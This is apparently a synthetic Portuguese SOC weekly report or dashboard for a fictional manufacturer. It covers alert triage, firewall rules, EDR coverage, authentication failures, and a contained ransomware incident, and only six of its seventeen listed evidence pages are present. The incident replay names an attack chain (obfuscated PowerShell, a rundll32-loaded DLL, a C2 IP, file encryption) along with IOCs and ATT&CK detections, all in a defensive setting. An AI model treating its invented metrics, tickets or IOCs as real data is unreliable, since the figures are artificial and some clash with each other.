Menu Fale conosco
ConfidencialConfidencial
Classificação: Uso Interno·Distribuição: Diretoria de TI·Rev 2.0·20/07/2026
Fl. 01 / 19
Flowbix
Grupo Vetria · Segurança & SOC · 24×7
Laudo operacional de segurança · Semana 29 · emissão dom 20/07/2026 · 15:12

Segurança & SOC

Uso Interno · SOC

A operação de segurança do Grupo Vetria4.200 endpoints em 43 sites, três datacenters e um SOC 24×7 com turno noturno do MSSP Vigia8 — documentada em dezessete evidências: da fila de triagem ao threat intel. Wazuh SIEM · FortiGate · AD VETRIA.CORP · Sysmon · SOAR Shuffle.

Sumário de EvidênciasFl.
EV-01Mesa de Triagem02
minha fila está sob controle? · 347 alertas · fila 28 · 3 estouram SLA
EV-02Perímetro em Corte03
que porta está aberta e quem é o dono? · 9,4 Gbps in · 2,1 bloq
EV-03Frota & Cobertura04
o que eu NÃO enxergo? · 88 sem EDR · 3 fontes mudas · MFA 91,4%
EV-04Identidade & Windows05
quem erra senha às 03h? · 18.442 falhas 4625 · pico 1.208/h
EV-05Sala de Crise· 17/0706
o que está contido e o que falta? · EV-2026-0142 · MTTC 42 min
EV-06SOAR & Posturaboard07
o que mostro na quinta? · 87% auto · risco 62/100 · R$ 4,2M
EV-07Regras & Tuning SIEM08
quais regras carregam a detecção? · 3.428 regras · 41 em tuning
EV-08Telemetria Sysmon09
o que os 4.037 agentes contam? · 14,5M ev/24h · EID 1/3/11/22
EV-09Sessões de Firewall10
o que passa na borda agora? · 128k sessões · 2.410 novas/s
EV-10IPS & Assinaturas11
que exploit bate na porta? · 12,3k ev/24h · 9.412 sigs · 14 crít
EV-11DNS & Egress12
alguém sai escondido pelo DNS? · 41M consultas · 12 DGA
EV-12Kerberos & NTLM13
estão pescando tickets? · 312 TGS RC4 · 3 SPNs em watch
EV-13Auditoria Windows14
o que mudou sem pedido? · 7045/4698/4663 · 1102 em investigação
EV-14Quarentena EDR15
o que o agente segurou? · 7 arquivos · 34 exclusões (3 em revisão)
EV-15Vulnerabilidades16
quais CVEs importam? · 1.842 abertos · KEV 17 · EPSS>0,7: 28
EV-16Threat Intel17
meus IOCs batem no ambiente? · 48.213 ativos · 61 hits/24h
EV-17Indicadores & Automação18
quais sinais viram ticket? · 15 indicadores · evento → SIEM → webhook → ITSM
janela de dados das evidências: seg 14/07 00:00 → dom 20/07 15:12 · fuso Brasília · dd/mm · vírgula decimal
Quadro 1 · Identificação da Operação
EmpresaGrupo Vetria · indústria de bens de consumo (higiene e limpeza)
Escopo4.200 endpoints · 43 sites — matriz SP · fábrica Jundiaí · 3 DCs · 38 filiais
StackWazuh SIEM · FortiGate · AD VETRIA.CORP · Sysmon · SOAR Shuffle
CoberturaSOC 24×7 · turno 22h–06h: MSSP Vigia8 (2 analistas remotos)
Volume11,8k EPS médio · pico 23,4k às 02h · 30,6B eventos/mês
PosturaATENÇÃO  risco 62/100 · ontem 58 · apetite da diretoria 45
AO VIVO · dom 20/07 15:12 · 11,8k EPS
01 / 18
Grupo Vetria / Segurança & SOC / Mesa de Triagem
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Postura do SOC ATENÇÃO risco 62/100 · ontem 58 · apetite da diretoria 45
Alertas hoje 347 média dos domingos: 298 · 31% concentrados 02h–04h
Fila agora 28 19 aguardando triagem · 9 em atendimento
Estouram SLA · 1h 3 próximo: ALR-8841 · 15h40 · mesma rajada de 14h40
Escalados MSSP 6 Vigia8 · mais antigo aguarda retorno há 22 min
MTTA hoje 4,2 min meta 5 min · P95 9,8 min · ontem 5,1 min
Turno atual 14h–22h 6 analistas em mesa · presencial matriz SP
22h–06h · MSSP Vigia8 · 2 analistas remotos

Funil de Detecção · 30 dias

Wazuh SIEM · correlação + EDR + FortiGate · 218 casos no mês
30,6Beventos brutos coletados
3,1% indexados
942Mindexados no SIEM
0,0013% viram alerta
12,4kalertas gerados
1,8% viram caso
218casos triados
4,1% viram incidente
9
ingestão: 11,8k EPS méd · pico 23,4k · 02h (backup + varredura)
janela 20/06 → 20/07
218 casos = 7,3/dia ›
‹ incidentes confirmados no mês
largura ∝ log₁₀ do volume · Wazuh indexer
R$ 4,2M de exposição evitada no mês metodologia: custo médio de parada × horas de contenção antecipada · gestão de riscos Vetria

Esteira de Triagem · fila priorizada

ordenada por prazo de SLA · 3 estouram na próxima hora · SLA P2 60 min · P3 4h · P4 8h
P2ALR-8841Beacon C2 periódico → 203.0.113.74:8443estoura em 0h28
wks-fab-104·chegou 14h40SIEMprazo 15h40
P2ALR-8843PowerShell ofuscado pós-anexo de e-mailestoura em 0h40
wks-fab-109·chegou 14h52EDRprazo 15h52
P2ALR-8846Enumeração SMB anômala em srv-arq-01estoura em 0h53
srv-arq-01·chegou 15h05SIEMprazo 16h05
P3ALR-8824Antivírus desativado · base local de clientesestoura em 2h38
pdv-fil07-03·chegou 13h50EDRLGPD · dado pessoalprazo 17h50
P3ALR-8832Logon de terceiro às 02h40 · fora de janelaestoura em 2h46
vpn-forti-01·conta manutencao-predialSIEM→ Vigia8 · aguardando há 22minprazo 17h58
P3ALR-8838Exportação em massa da base de RH · d.oliveiraestoura em 3h08
srv-folha-01·chegou 14h20EDR→ N2LGPD · dado pessoalprazo 18h20
P4ALR-8819Tráfego na porta 8443 · regra sem dono (2019)estoura em 6h32
fgt-mtz-01·chegou 13h44FWprazo 21h44
+12 na fila · P3/P4 aguardando triagem · mais antigo há 1h05 · 9 em atendimento com analista

Ocupação do Turno

6 analistas · 14h–22h · 9 casos em atendimento
Renata C.2 casos
coordena INC-0147 · CS-2208
líder do turno · 44 triados · ack 15h08
Douglas M.2 casos
CS-2210 · CS-2214 · endpoint/EDR
61 triados hoje · último ack 15h03
Aline F.2 casos
CS-2211 · CS-2216 · dados pessoais/LGPD
57 triados hoje · último ack 14h57
Túlio B.1 caso
CS-2209 · perímetro FortiGate
63 triados hoje · último ack 15h10
Marcos P.1 caso
CS-2213 · identidade AD VETRIA.CORP
48 triados · aprovação PB-11 com ele
Yasmin R.1 caso
CS-2217 · triagem geral
46 triados · absorve P3 da fila até 16h
319 de 347 alertas já triados hoje · ocupação média 68% · decisão do plantão: Yasmin puxa os P3 da fila até 16h

Últimas Ações do SOAR

Shuffle · janela 14h–15h12 · 87% auto · 13% humano
15h09
bloqueio de 203.0.113.74 replicado nas 38 filiais
PB-03 · FortiGate · gatilho: ALR-8841
AUTO
15h04
coleta forense EDR disparada em wks-fab-104
PB-07 · pacote de triagem · 4 artefatos
AUTO
14h58
svc-backup marcado p/ revisão de credencial
PB-11 · aguarda aprovação de Marcos P.
HUMANO
14h52
IP 203.0.113.74 bloqueado · playbook PB-03
fgt-mtz-01 · política EDGE-DENY · TTL 24h
AUTO
14h47
arquivo em quarentena em pdv-fil07-03
PB-05 · hash sha256 …9f2e · EDR
AUTO
14h41
IOCs de ALR-8841/8843/8846 enriquecidos
PB-01 · 3 fontes de reputação · veredito: malicioso
AUTO
14h33
ticket TK-30412 aberto no ITSM
PB-09 · vínculo ALR-8838 · fila N2
AUTO
14h26
4 alertas duplicados suprimidos
PB-02 · correlação host+regra · janela 15 min
AUTO
14h18
suspensão de VPN proposta · manutencao-predial
PB-11 · aprovação pendente · vence 16h00
HUMANO
312 ações/semana ≈ 61h ≈ 1,4 analista não contratado · 2 aprovações humanas pendentes
Wazuh · EDR · FortiGate · fila 28 · SLA P1 15 min (contrato Vigia8) · Grupo Vetria · dom 20/07 15:12
EV-01 · 1 de 17
Grupo Vetria / Segurança & SOC / PERÍMETRO EM CORTE
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Corte Transversal do Perímetro — quem atravessa a parede, quem é o dono

policy fgt-mtz-01 · 214 regras · CMDB/GMUD cruzados · 5 travessias · 1 sem dono
travessia permitida · com dono saída crítica de negócio poro sem dono descartado na parede ação: RITM-2201 aberto 14h20 · bloquear 8443 e caçar o dono · janela GMUD ter 22/07 22h · resp. Douglas M.

Top 10 Regras por Hit

policy fgt-mtz-01 · hits 24h · barra em escala log₁₀
escala log₁₀
10³10⁴10⁵10⁶10⁷
R-214
deny · WAN → any implícita · fim de políticaBLOQUEIO
8,4M
R-001
permit · 443 → portal-vetria WAF em linhaPERMIT
4,2M
R-076
deny · geo-block RU·KP·IR GMUD 1980BLOQUEIO
1,6M
R-058
permit · NF-e → SEFAZ-SP rota fiscal dedicadaNEGÓCIO
812k
R-102
permit · 10443 VPN-SSL MFA obrigatórioPERMIT
274k
R-031
permit · 25 → srv-mail-01 TLS obrigatórioPERMIT
158k
R-141
deny · 445 SMB vindo da WAN higiene básicaBLOQUEIO
94k
R-009
permit · 53 → resolvers somente 10.20.30.53PERMIT
71k
R-188
rate-limit · ICMP echo 50 pps por origemRATE-LIMIT
12k
R-163
permit · 8443 → 10.20.61.44 último hit 14h58SEM DONO
3,1k
R-163 casa com o poro órfão 8443 — 3,1k hits vivos numa regra de 2019 · decisão: negar na GMUD de ter 22/07 22h (RITM-2201)

Throughput na Borda · 24 h

SNMP 60 s · Gbps · entrada azul · bloqueado grafite
12,09,06,03,00
Gbps · entrada WAN fgt-mtz-01
varredura 02h · pico 11,2 G · 4,1 G bloq
agora 9,4 G · 2,1 bloq
15h19h23h03h07h11h15h12
faixa grafite = bloqueado na parede · média 22,3% da entrada · varredura 02h de 203.0.113.0/24 randomizado — morreu na deny implícita · sem ação humana

Top Países de Origem — Bloqueados

GeoIP · 18,4M sessões bloqueadas · 24h
CN
China 74% SYN scan portas 1–1024
6,2M · 33,7%
US
EUA abuso de nuvem · 61% em 443
3,8M · 20,7%
RU
RússiaGEO-BLOCK · GMUD 1980
2,4M · 13,0%
NL
Países Baixos hosting bulletproof
1,5M · 8,2%
VN
Vietnã botnet IoT · telnet 23
1,1M · 6,0%
BR
Brasil brute force VPN 10443→ EV-05
0,9M · 4,9%
IN
Índia SIP 5060 · scanners
0,7M · 3,8%
KR
Coreia do Sul RDP 3389
0,5M · 2,7%
+61
Outros cauda longa · 61 países
1,3M · 7,1%
geo-block RU·KP·IR ativo (GMUD 1980) · 203.0.113.201 — o IP que bate no 8443 — origina de AS BR e não cai no geo-block
FortiGate fgt-mtz-01 (HA) · syslog → Wazuh · 214 regras ativas · Grupo Vetria · dom 20/07 15:12
EV-02 · 2 de 17
Grupo Vetria / Segurança & SOC / FROTA & COBERTURA
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Muro de Cobertura · 43 sites

célula = site · barra 1 EDR instalado · barra 2 vivo <24h · 1 crit · 4 warn · 38 ok — console EDR + AD VETRIA.CORP
MTZMATRIZ SÃO PAULO
EDR 1.198/1.240 · inst 1.218 · MFA 93,1%
1.240 endpoints22 ROLLOUT · FIM 29/07
FABFÁBRICA JUNDIAÍ
EDR 590/610 · inst 598 · MFA 86,2%
610 hosts12 LEGADO · COMPENSAÇÃO: VLAN OT
DCJDI ON-PREM
EDR 157/158
MFA 97%
DCSPO COLO
EDR 145/146
MFA 97%
DRNUVEM
EDR 76/76 · inst 76
MFA 98%STANDBY
F01CAMPINAS
EDR 57/59 · inst 59
MFA 93%
F02RIB. PRETO
EDR 51/52 · inst 52
MFA 90%
F03S.J. CAMPOS
EDR 53/54 · inst 54
MFA 93%
F04SANTOS
EDR 46/47 · inst 47
MFA 90%
F05BAURU
EDR 41/42 · inst 42
MFA 93%
F06UBERLÂNDIA
EDR 34/41 · MFA 88%
COBERTURA 85%
F07B. HORIZONTE
EDR 76/78 · inst 78
MFA 93%
F08JUIZ DE FORA
EDR 39/40 · inst 40
MFA 90%
F09RIO DE JAN.
EDR 80/82 · inst 82
MFA 93%
F10NITERÓI
EDR 43/44 · inst 44
MFA 90%
F11VITÓRIA
EDR 45/46 · inst 46
MFA 93%
F12SALVADOR
EDR 64/66 · MFA 91%
FGT MUDO 3D
F13F. SANTANA
EDR 38/38 · inst 38
MFA 93%
F14ARACAJU
EDR 39/40 · inst 40
MFA 90%
F15MACEIÓ
EDR 42/46 · inst 43
MFA 93%
F16RECIFE
EDR 62/64 · inst 64
MFA 90%
F17JOÃO PESSOA
EDR 41/42 · inst 42
MFA 93%
F18NATAL
EDR 43/44 · inst 44
MFA 90%
F19FORTALEZA
EDR 60/62 · inst 62
MFA 93%
F20TERESINA
EDR 40/44 · inst 41
MFA 90%
F21SÃO LUÍS
EDR 43/49 · inst 44
MFA 93%
F22BELÉM
EDR 53/58 · inst 55
MFA 90%
F23MANAUS
EDR 54/55 · inst 55
MFA 93%
F24BRASÍLIA
EDR 74/76 · inst 76
MFA 90%
F25GOIÂNIA
EDR 55/56 · inst 56
MFA 93%
F26ANÁPOLIS
EDR 38/38 · inst 38
MFA 90%
F27C. GRANDE
EDR 44/45 · inst 45
MFA 93%
F28CUIABÁ
EDR 48/55 · MFA 89%
6 SEM EDR
F29CURITIBA
EDR 70/72 · inst 72
MFA 93%
F30LONDRINA
EDR 47/48 · inst 48
MFA 90%
F31MARINGÁ
EDR 43/44 · inst 44
MFA 93%
F32JOINVILLE
EDR 49/50 · inst 50
MFA 90%
F33FLORIANÓP.
EDR 51/52 · inst 52
MFA 93%
F34BLUMENAU
EDR 41/42 · inst 42
MFA 90%
F35P. ALEGRE
EDR 68/70 · inst 70
MFA 93%
F36CAXIAS SUL
EDR 44/45 · inst 45
MFA 90%
F37PELOTAS
EDR 40/40 · inst 40
MFA 93%
F38SOROCABA
EDR 15/44 · MFA 84%
ROLLOUT · 28
Frota 4.200: matriz 1.240 · fábrica 610 · DCs 380 · filiais 1.970 — EDR 4.112 inst · 4.037 vivos · 218 desatualizados · 88 sem (12 legado + 76 rollout) · MFA 91,4% (311/3.612 sem)
decisão 15h04 · Renata C.: endpoint sem EDR perde acesso à VPN a partir de seg 21/07 08h · exceção única: VLAN OT (GMUD 2231) · dono: endpoint-eng

Fontes de Log · esperadas × recebendo

Wazuh coletores · syslog + agente · janela 24 h · 206 fontes ok ocultas da lista
214
esperadas
catálogo CMDB
206
recebendo ok
meta ≥ 210 (98%)
5
atrasadas
pior: 22 min
3
mudas
pior: 3d 6h
96,3% no prazo · ingestão 11,8k EPS méd · pico 23,4k · 02h (backup + varredura)
fonteorigem / tipoúltimo eventogap24 hestado / ação
fgt-fil12-01FortiGate syslog · FIL-12 Salvadorqui 17/07 09h143d 6hMUDA · TK-30412 · infra-redes
srv-arq-01auditoria de arquivos · DC-JDIdom 20/07 06h029h 10mMUDA · TK-30447 · verif. 15h30
wks-fab-101Sysmon · chão de fábricadom 20/07 11h084h 04mMUDA · reinstalar agente
vpn-forti-01FortiGate VPN-SSL · bordadom 20/07 14h5022 minATRASADA · fila syslog
srv-folha-01agente Wazuh · folha Seniordom 20/07 14h5418 minATRASADA · janela batch
pdv-fil07-03agente Wazuh · PDV FIL-07dom 20/07 15h0012 minATRASADA · link da filial
dc-spo-01WEF · DC SP colocationdom 20/07 15h039 minATRASADA · em observação
portal-vetrianginx/WAF · portal B2Bdom 20/07 15h057 minATRASADA · normalizando
3 mudas: fgt-fil12-01 mudo há 3d — causa raiz da violação de SLA EV-0121 · escalado Vigia8 + infra-redes (TK-30412) · Douglas M. cobra retorno até 16h00
Ilha de análise · adversário & leste-oesteREPLAY · EV-2026-0142 · qui 17/07

Trilha de Campanha · MITRE ATT&CK

detecções 30 d · Wazuh → ATT&CK · trilha 1→7 = EV-2026-0142
InicialExecuçãoPersist.Esc. privEvasãoCredenc.Descob.LateralImpacto
T1566412
Phishing
T119037
Expl. app pública
T113354
Serviço remoto ext.
T10782.348
Contas válidas
T1204188
Execução p/ usuário
T10591.274
PowerShell / script
T104796
WMI
T156941
Serviços do sistema
T1053342
Tarefa agendada
T1547214
Autostart / registro
T113628
Criar conta
T15059
Web shell
T154877
Abuso de elevação
T113441
Manipulação de token
T157433
Hijack de DLL
T106812
Expl. p/ privilégio
T1027391
Ofuscação
T105561
Injeção de processo
T1562144
Desativar defesas
T107088
Limpeza de logs
T111018,4k
Força bruta
pico 1.208/h · 03h10
T1558117
Kerberoasting
T155264
Cred. em arquivos
T100352
Dump de credenciais
T10461.842
Varredura de serviços
T1082903
Info do sistema
T1018516
Sistemas remotos
T1069233
Grupos de permissão
T157073
Transf. de ferramenta
T155019
Pass-the-hash
T1021688
Serviços remotos · RDP
T153411
Phishing interno
T14907
Inibir recuperação
T148915
Parar serviços
T15312
Remover acesso
T14863
Criptografia p/ impacto
1 2 3 4 5 6 entrada: e-mail “NF-e” falsa → wks-fab-104 · qui 14h05 salto p/ mov. lateral 18 min depois · RDP
7CONTIDO · bloqueado: EDR · regra 4412 · qui 17/07 14h47detecções 30 dMTTC 42 min

Ranking Leste-Oeste · top-5 rotas

FortiGate · tráfego interno 24 h · largura ∝ log₁₀
ESTAÇÕES OT · CHÃO DE FÁBRICA214CRÍTICO · 100% BLOQ
10.20.40.0/22 → 10.20.88.0/24 · 12 origens · alvo wks-fab-101..112 · política PL-88 DENY
TERCEIROS · VPN ERP PROTHEUS41237 BLOQ · EM ANÁLISE
manutencao-predial entre as origens · logon 02h40 fora de janela · TK-30398
ESTAÇÕES SERVIDORES DC-JDI1.40896 BLOQ
10.20.40.0/22 → 10.20.10.0/24 · SMB/LDAP dentro do baseline
FILIAIS MATRIZ · AD & ARQUIVOS3.216PERMITIDO
38 filiais → dc-jdi-01 · autenticação e GPO · sem desvio
SERVIDORES SERVIDORES · DCs8.940BASELINE
replicação + backup 02h · srv-bkp-01 responde pelo pico
decisão 14h40 · Aline F.: microssegmentação OT fase 2 antecipada — GMUD 2258 · janela qua 23/07 22h · dono: infra-redes
Licenciamento & parque · console EDR · contrato 2026
LICENÇAS EDR 4.112/4.200 RENOVA EM 43 d · 01/09 R$ 38/endpoint 12 LEGADO WIN7 · VLAN OT 76 ROLLOUT · fim 29/07 218 AGENTE ANTIGO · update qua 23/07
console EDR · AD VETRIA.CORP · Wazuh coletores · FortiGate — janelas 24 h e 30 d · Grupo Vetria · dom 20/07 15:12
EV-03 · 3 de 17
Grupo Vetria / Segurança & SOC / Identidade & Windows
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Sucessos de autenticação · 4624

Event Viewer → Wazuh · 6 DCs · escala log₁₀
pico 6.412/h às 08h · baseline 7d +2,1%96.418sucessos · 24h
10¹10²10³10⁴1
conta · tipo
24.318
svc-protheus
serviço · ERP Protheus
18.204
svc-nfe
serviço · NF-e / SEFAZ-SP
12.440
svc-monitor
serviço · coletores Wazuh
8.211
svc-portal
serviço · portal-vetria · DMZ
4.926
svc-arquivos
serviço · srv-arq-01
342
adm-ti-01
admin de domínio · via PAM
118
renata.c
humana · SOC N2 · 14–22h
96
douglas.m
humana · SOC N1 · 14–22h
84
aline.f
humana · SOC N1 · 14–22h
14
svc-backup
serviço · job de fita 02h
6
manutencao-predial
logon 02h40 · fora de janela
2
administrator
builtin · desabilitação em GMUD
27.657
outras 3.581 contas
cauda · contas ativas na janela
✓ serviços = 71% do volume · manutencao-predial (terceiro) logou às 02h40 — Túlio B. valida com a portaria · demais contas dentro do padrão

AD VETRIA.CORP

espinha de contas · 6 DCs
3.612contas habilitadas
43 sites · 214 grupos
COBERTURA MFA91,4%
311 sem MFA · 187 no corte 31/07 · 124 exceção
3.474humanas
74serviço
23admin
41terceiros
controladores de domíniorepl ok · auth JDI 47%
dc-jdi-01PDC · fáb. Jundiaírepl 00:01OK
dc-jdi-02fáb. Jundiaírepl 00:02OK
dc-spo-01DC SP · colocationrepl 00:02OK
dc-spo-02DC SP · colocationrepl 00:04OK
dc-mtz-01matriz SPrepl 00:03OK
dc-dr-01DR · nuvemrepl 00:26SYSVOL +26m
✎ 311 sem MFA: 187 entram no corte de 31/07 · 124 com exceção assinada pela diretoria — revisão set/26

Rosácea horária · 4625

24 fatias · 1 fatia = 1h
00 06 12 18 18.442 4625 · 24h pico 1.208 · 03h10 spray · 203.0.113.44/.51 raio ∝ falhas/h guias 604 · 1.208 comercial 08–19h
02–04h · spraydemaiscomercial 08–19h

Falhas de autenticação · 4625

janela 24h · pico 03h10 · escala log₁₀
18.442falhas · 24hpico 1.208/h às 03h10 · 47 lockouts (4740)
conta · tipo
10¹10²10³10⁴1
svc-protheus
serviço · srv-erp-01
12
svc-nfe
serviço · emissão fiscal
3
svc-monitor
serviço · sem falhas 24h
0
svc-portal
serviço · form externo · WAF
164
svc-arquivos
serviço · srv-arq-01
8
adm-ti-01
admin · 4672 correlatos
28
renata.c
humana · 2 typos
2
douglas.m
humana · 5 typos
5
aline.f
humana · 1 typo
1
svc-backup
alvo do spray · SOC-2214
2.417
manutencao-predial
terceiro · janela 07h–18h
1
administrator
alvo padrão · spray
1.893
outras 3.581 contas
spray raso · 8–12 tent./conta
13.908
✎ spray 02h–04h de 203.0.113.44/.51 contra vpn-forti-01 — bloqueio no FortiGate às 04h12 · SOC-2214 · Renata C. · reset de svc-backup na GMUD de hoje 22h

Ticker de eventos Windows · por hora

1 célula = 1h · 03h = janela do spray · 15▾ = agora · Event Viewer → Wazuh · 6 DCs
evento / hora
00
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15▾
16
17
18
19
20
21
22
23
4625 · falha de logon
18.442 · pico 1.208 · 03h10
192
218
704
1.208
1.002
386
468
731
1.044
1.176
1.132
1.058
864
948
1.102
986
1.021
1.084
872
598
512
444
381
311
4740 · conta bloqueada
47 · pico 9 · 03h · desbloq. 31
·
·
4
9
6
1
·
1
2
3
2
2
1
1
2
2
1
3
1
2
1
1
1
1
4672 · logon privilegiado
1.874 · pico 196 · 02h (backup)
31
28
196
44
38
33
41
58
102
118
112
104
88
96
109
101
98
94
82
64
52
48
71
66
Event Viewer → Wazuh · 4624/4625/4740/4672 · 6 DCs · janela 24h · Grupo Vetria · dom 20/07 15:12
EV-04 · 4 de 17
Grupo Vetria / Segurança & SOC / SALA DE CRISEREGISTRO DO INCIDENTE · QUI 17/07 · 14H05
INCIDENTE EV-2026-0142 · CONTIDOreplay do registro forense
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
INCIDENTE CRÍTICO · RANSOMWARE CONTIDO · EV-2026-0142
vetor: phishing · anexo fatura_0687.docm · paciente zero: wks-fab-104
extensão .vetlock · detecção 14h05 → contido 14h47 · registro fechado 19h40
CONTIDO · 14H47
Hosts isolados
14/17
demais 3 desligados a frio
Contas resetadas
23/23
svc-backup incluída · 14h58
Hashes bloqueados
8
push EDR + FortiGate · 14h21
MTTC
42 min
detecção 14h05 · contido 14h47
Backup imutável
OK
há 6h · restore testado 12/07

Placar de Contenção · Checklist de Crise

war room #ir-0142 · EDR + SOAR Shuffle + Vigia8
Checklist de contenção
6/9
3 pendentes · 2 com prazo
Evidências preservadas
32
3 imagens de disco · hash ok
Playbooks executados
6
2 aprovações humanas
Janela do registro
5h35
14h05 → 19h40 · qui 17/07
MSSP Vigia8 notificadobridge #ir-0142 aberta · prontidão do turno 22h–06h
14h11PB-02 · AUTO
C2 203.0.113.88 bloqueadofgt-mtz-01 · política de saída · 8 hashes em push
14h19PB-04 · AUTO
Diretoria avisadacomitê de crise convocado · sala de guerra às 14h45
14h32RENATA C.
Seguradora acionadaapólice cyber · protocolo SIN-88213 aberto
15h05JURÍDICO
Comunicação interna43 sites · orientação: não religar estações isoladas
15h40MARCOS P.
Coleta forense concluídaimagem de disco wks-fab-104 · cadeia de custódia ok
16h05TÚLIO B.
Avaliação ANPD · notificação em 3 dias úteisart. 48 LGPD · RIPD parcial anexado ao caso
vence 23/07DPO
Restore validadosrv-arq-01 · 312 arquivos a partir do imutável · em curso
em cursoYASMIN R.
Varredura de persistência43 sites · scheduled tasks + run keys + contas novas
21h00ALINE F.
Decisão do comitê (17/07 17h20): clientes B2B só serão notificados após validação do restore — DPO + jurídico · resgate: não pago

Árvore de Processo Forense

Sysmon + EDR · host wks-fab-104
sem movimento lateral confirmado até 19h40
varredura 21h00 · decisão: VLAN OT segregada
EID 1 · processoEID 3 · redeEID 11 · arquivo
IOC: 8 hashes · 1 IP · ext .vetlock
push 14h21 · watchlist Wazuh 72h
winword.exeEID 1
14h05 · fatura_0687.docm
powershell.exeEID 1
14h07 · -enc · ofuscado
rundll32.exeEID 1
14h12 · public\upd.dll
203.0.113.88:443EID 3
14h19 · beacon TLS · C2
gravação *.vetlockEID 11
14h21 · srv-arq-01 · 312 arq
EDR · regra 4412
14h23 · processo finalizado
host isolado · contido
14h47 · MTTC 42 min ✓
14h05 14h15 14h25 14h35 14h47 ∕∕ 16h40 erradicação 19h40 fechado
reconstrução do EDR validada manualmente — perícia: Túlio B. · imagem de disco preservada · custódia ok

Kill-chain do ataque

cadeia de 7 elos · rompida no elo 7 · EDR + Wazuh · qui 17/07

Ações SOAR da contenção

Shuffle · 2 aprovações humanas no bridge
14h05PB-01alerta EDR correlacionado → caso EV-2026-0142 aberto · P1AUTO
14h19PB-04IP 203.0.113.88 bloqueado no FortiGate · política de saídaAUTO
14h21PB-078 hashes → lista de bloqueio EDR + FortiGateAUTO
14h32PB-09isolamento wks-fab-101..112 + 2 servidores · fim 14h47 · aprovou Renata C.HUMANO
14h58PB-05reset de 23 contas · svc-backup incluída · aprovou Douglas M.HUMANO
15h20PB-11IOC → watchlist Wazuh + MSSP Vigia8 · vigília de 72hAUTO
Replay do incidente EV-2026-0142 · qui 17/07 14h05→19h40 · EDR + Wazuh + SOAR Shuffle · Grupo Vetria · dom 20/07 15:12
EV-05 · 5 de 17
Grupo Vetria / Segurança & SOC / SOAR & POSTURA
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Circuito SOAR · do alerta à ação sem tocar teclado

SOAR Shuffle · 12 playbooks ativos · webhook Wazuh · semana 29
WAZUH SIEM12,4k alertas/mês · 11,8k EPS
ENRIQUECIMENTOGeoIP · VirusTotal · AD VETRIA.CORP
CORRELAÇÃOdedup · 218 casos/mês
GATE
87%AUTO271 ações/sem
13%HUMANO41 ações/sem
PB-03 · BLOQUEIO IPFortiGate · 118/sem
PB-07 · ISOLAR HOSTEDR · 64/sem
PB-11 · RESET DE CONTAAD · 89/sem
FILA DO ANALISTAaprovação dupla · N2
EXECUÇÃO ASSISTIDA41/sem · Túlio B.
Retorno da automação · sem. 29 312 ações/semana 61 h de trabalho manual poupado ≈ 1,4 analista não contratado base 11,7 min/ação · FTE CLT 44 h/sem · média do trimestre

MTTD → MTTR por incidente · eixo log

casos Wazuh · SLA Vigia8 · tri abr–jul
4,2 min
MTTA hoje · fila 28
42 min
MTTC do EV-0142
2
violações no tri
P1: conter 4h · contrato Vigia8
EV-2026-0142 · ransomware · qui 17/07 · Renata C.3 min → 42 min ✓
EV-2026-0137 · phishing dirigido · sex 11/07 · Douglas M.11 min → 1h50 ✓
EV-2026-0129 · malware em estação · ter 08/07 · Aline F.2 min → 9 min ✓
EV-2026-0121 · intrusão em filial · sáb 28/06 · turno Vigia81h05 → 6h50 ✗
causa: log de filial mudo · fgt-fil12-01 · cruzou a meta contratual de 4h
2 min5 min1 h4 h8 h24 h
CONTRATO VIGIA8 P1: reconhecer 15 min · conter 4h · vigência mar/27 · 2 violações no tri (EV-0121 · EV-0098) detecção contenção
decisão: watchdog de fontes por filial (dono: infra · até 15/08) — sem log, o relógio do MTTD nem começa a contar · revisão do contrato Vigia8 em set/26

Alertas por dia · 13 semanas

Wazuh alertas/dia · s17–s29 · feriados BR
s17s18s19s20s21s22s23s24s25s26s27s28s29 seg ter qua qui04/06894 sex sáb dom347
média 413/dia · pico 894 (qui 17/07 · EV-2026-0142) Corpus Christi 04/06 · véspera 03/06: postura elevada
próximo feriado nacional: 7 de setembro (seg) — véspera de feriado · postura elevada · plantão Vigia8 reforçado · sáb 28/06 tracejado = EV-0121

Funil do mês · do bruto ao incidente

Wazuh · janela 30d · jun→jul
3,1% 0,001% 1,8% 4,1%
30,6B
brutos
942M
indexados
12,4k
alertas
218
casos
9
incidentes
exposição evitada no mês: R$ 4,2M metodologia: custo médio de parada (R$/h por serviço)
× horas de contenção antecipada vs. linha de base do tri

RESUMO EXECUTIVO

SEMANA 29 · 20/07 · print-ready
Velocímetro de risco score composto · GRC · rev dom 15:12
62/100
ATENÇÃO
ontem 58 (agulha-fantasma) · Δ +4
apetite da diretoria: 45 · desvio +17
Serviços de negócio · custo de parada R$/h · validado c/ controladoria
NF-e / SEFAZfaturamento · matriz + 38 filiais
R$ 138k/h
incidente ativo · 14h37
ERP Protheussrv-erp-01 · DC Jundiaí
R$ 96k/h
operando
PDV filiais38 filiais · pdv-fil07-03 em obs.
R$ 41k/h
operando
Portal B2Bportal-vetria · DMZ
R$ 18k/h
operando
Folha Seniorsrv-folha-01 · janela dia 25
R$ 12k/h
janela
Selos de compliance GRC · auditoria interna · jul/26
CONFORME · 3 PENDÊNCIAS
78% CIS 1818 controles
84% ISO 27001 · A14 domínios
88% LGPD10 requisitos
ISO A.8.16 · monitoramento de atividades em filiais — dono: infraplano 15/08
LGPD · RIPD do PDV pendente de assinatura — dono: DPOminuta 24/07
CIS 8 · retenção de logs 90d nas filiais — dono: infraliga à EV-0121
licenças: EDR 4.112/4.200 · renovação em 43d · R$ 38/endpoint — Wazuh + Shuffle: OSS · suporte via contrato Vigia8
SOAR Shuffle · 312 ações/sem · contrato Vigia8 · semana 29 · Grupo Vetria · dom 20/07 15:12
EV-06 · 6 de 17
